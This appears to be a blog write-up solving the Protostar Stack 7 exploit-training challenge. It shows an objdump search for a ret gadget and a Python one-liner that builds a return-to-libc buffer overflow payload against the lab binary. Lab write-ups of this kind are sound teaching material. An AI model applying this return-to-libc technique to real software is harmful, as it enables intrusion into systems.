Protostar Exploit Challenges Stack 7 Solution


This challenge is nearly identical to the last except that you must find a random ret to use and then jump to system.


Using the same tactics as before I determined the address of my environment variable was at 0xbffffe63.

Now we need is a gadget containing a RET. There are fancier, more sophisticated ways to do this, but I’m just going to use objdump.

objdump -D stack7 | grep -E ‘pop\s*%e[a-d]x’ -A5 | grep ret -B1
8048382: c9 leave
8048383: c3 ret

8048493: 5d pop %ebp
8048494: c3 ret

80485c8: 5d pop %ebp
80485c9: c3 ret

80485f8: 5d pop %ebp
80485f9: c3 ret

8048616: c9 leave
8048617: c3 ret

As it happens there are a few! I decided to go with the one at 0x08048383.

python -c ‘print “A”*80 + “\x83\x83\x04\x08” + “\xb0\xff\xec\xb7” + “A”*4 + “\x6c\xfe\xff\xbf”‘

And that works just fine!


It prints the word NONSENSE as expected.


Leave a Reply